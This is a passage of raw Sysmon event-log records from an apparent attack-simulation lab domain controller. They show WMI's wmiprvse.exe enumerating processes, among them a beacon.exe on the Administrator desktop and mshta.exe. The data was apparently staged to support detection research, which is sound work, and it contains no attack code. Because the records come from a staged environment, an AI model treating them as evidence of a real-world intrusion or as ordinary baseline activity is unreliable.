16:54:15.172{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002240846Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.172{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3117D9942781E532666A0C4F832854C4,SHA256=7EA9E6EC5B76BCEFCE301B76C353FB7EEE0F4B1A4AC27D144E4476FA6CCE072A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002240845Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.172{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240844Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.171{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240843Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.170{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240842Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240841Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240840Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240839Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240838Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240837Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240836Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240835Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240834Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240833Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240832Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240831Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240830Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240829Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240828Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240827Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT